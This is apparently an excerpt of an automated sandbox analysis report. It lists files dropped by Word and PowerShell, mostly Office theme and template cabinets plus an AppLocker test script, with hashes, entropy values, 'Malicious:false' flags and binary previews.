                                                  SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):976001
                                                  Entropy (8bit):7.791956689344336
                                                  Encrypted:false
                                                  SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                  MD5:9E563D44C28B9632A7CF4BD046161994
                                                  SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                  SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                  SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):278
                                                  Entropy (8bit):3.5270134268591966
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                  MD5:327DA4A5C757C0F1449976BE82653129
                                                  SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                  SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                  SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):1097591
                                                  Entropy (8bit):7.99825462915052
                                                  Encrypted:true
                                                  SSDEEP:24576:UE9BMy98gA4cDWHkSrDans3MfEE6w8OaVuCibol0j41dwD:UE9Bdy3D4keQWt7w85VuVoaj4/Q
                                                  MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                  SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                  SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                  SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                  Malicious:false
                                                  Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):1310275
                                                  Entropy (8bit):7.9985829899274385
                                                  Encrypted:true
                                                  SSDEEP:24576:NN3M9UHpHZE4aubaPubP3M6d71FdtmFAjq+54/79LVzG+VnS:NN3M9UJHZE4abPyU4JtmFCq+q/7JlVS
                                                  MD5:9C9F49A47222C18025CC25575337A965
                                                  SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                  SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                  SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                  Malicious:false
                                                  Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):1766185
                                                  Entropy (8bit):7.9991290831091115
                                                  Encrypted:true
                                                  SSDEEP:24576:O/gjMj+RP9Q07h9F75a0BXjBccHMVk2Hq2SkGa0QglyZtxmdPP2LcSUtfgfp16Yx:kJ6RP9Q07/X5V7yVF0QgktxAPutUt0zP
                                                  MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                  SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                  SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                  SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                  Malicious:false
                                                  Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):1881952
                                                  Entropy (8bit):7.999066394602922
                                                  Encrypted:true
                                                  SSDEEP:49152:6Wp9u/ZAvKz7ZFCejPiSmYXKIr6kBwBUA:6W6Bn7ZFNiiKo2l
                                                  MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                  SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                  SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                  SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                  Malicious:false
                                                  Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):2591108
                                                  Entropy (8bit):7.999030891647433
                                                  Encrypted:true
                                                  SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                  MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                  SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                  SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                  SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                  Malicious:false
                                                  Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):2527736
                                                  Entropy (8bit):7.992272975565323
                                                  Encrypted:true
                                                  SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                  MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                  SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                  SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                  SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                  Malicious:false
                                                  Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):3256855
                                                  Entropy (8bit):7.996842935632312
                                                  Encrypted:true
                                                  SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                  MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                  SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                  SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                  SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                  Malicious:false
                                                  Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):3417042
                                                  Entropy (8bit):7.997652455069165
                                                  Encrypted:true
                                                  SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                  MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                  SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                  SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                  SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                  Malicious:false
                                                  Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):31482
                                                  Entropy (8bit):7.808057272318224
                                                  Encrypted:false
                                                  SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                  MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                  SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                  SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                  SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                  Malicious:false
                                                  Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):20457
                                                  Entropy (8bit):7.612540359660869
                                                  Encrypted:false
                                                  SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                  MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                  SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
